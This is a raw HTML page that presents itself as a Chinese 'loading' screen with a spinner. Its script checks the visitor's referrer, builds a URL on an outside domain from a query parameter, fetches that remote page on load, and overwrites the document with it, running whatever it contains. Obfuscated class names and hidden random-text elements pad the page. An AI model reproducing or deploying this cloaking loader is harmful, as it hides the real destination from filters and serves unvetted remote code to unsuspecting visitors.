<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .S9rJfHiWjr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .S9rJfHiWjr .RruAAdQglPM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .S9rJfHiWjr .content {
            line-height: 50px;
            text-align: center
        }

        .S9rJfHiWjr .img {
            width: 100%
        }

        .S9rJfHiWjr .iqFywixkt1 {
            text-align: center
        }

        .S9rJfHiWjr .iqFywixkt1 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .S9rJfHiWjr .iqFywixkt1 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .S9rJfHiWjr .iqFywixkt1 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .S9rJfHiWjr .iqFywixkt1 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .S9rJfHiWjr .iqFywixkt1 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .S9rJfHiWjr .iqFywixkt1 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .S9rJfHiWjr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IL1mHYZggnXte(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var PevIen = IL1mHYZggnXte('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ PevIen +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ PevIen +".html?a=share";
		}
		
        pBvnEH9U=url+"#"+new Date().getTime();
        pBvnEH9U && function() {
            $.get(pBvnEH9U, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>ZmOX2bxnO06L7tDqSjsXinHTYZkUbo</p>
<img  src='' style='display:none'>
<p  style='display:none'>ZmOX2bxnO06L7tDqSjsXinHTYZkUbo</p>
<h1 style='display:none' >y9TeQ4JvQXTSAWM2pyXXhGyBjO51</h1>
<a  href='#' style='display:none'>EdgRs7hhCmIuQqMhhPaB9TeGFsS4M5xRX0Tq3ZoKYPR7NEIX0fnSh18anGZlrXhtAZJYbUL2I6QpYQIMbuXP5Qy1dJ</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<span style='display:none'>yiHzQqBBfQV54MYkX1r5LoPGgLX7P5GzyDvaK</span>
<div style='display:none'>VHOFY3IT2EC2DkzVCca1TCLDgabAB8lLRXiNl6hbScjzErhyS</div><div class="S9rJfHiWjr">
    <div class="RruAAdQglPM">
        <div class="iqFywixkt1">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >rj2IV7bof8eL5bDGiTo9Kd9gS4PYK7f</h1>
<b style='display:none' >JGropLXC88Kuzbb0J</b>
<a  href='#' style='display:none'>YVTUlyoplNJmTTCwZnqx0Ft5ZN8LBNvmd</a>
<b style='display:none' >JGropLXC88Kuzbb0J</b>
<a  href='#' style='display:none'>YVTUlyoplNJmTTCwZnqx0Ft5ZN8LBNvmd</a>
<p  style='display:none'>NfbzW8jr51fE6PKnAkTdGBn8gG2Zmgh7PBzIJprNtkZhBigodVf3fzmy4RGIYuqUMadowsnwcNdoYhKAKJXv4eF9jz4</p>
<span style='display:none'>VMhWKcZRJ8ZyolXoBXmOd8MRnpGeomUapAncvvUpelle7c4UFwMD7LQreKSydTYh4</span></body>
</html>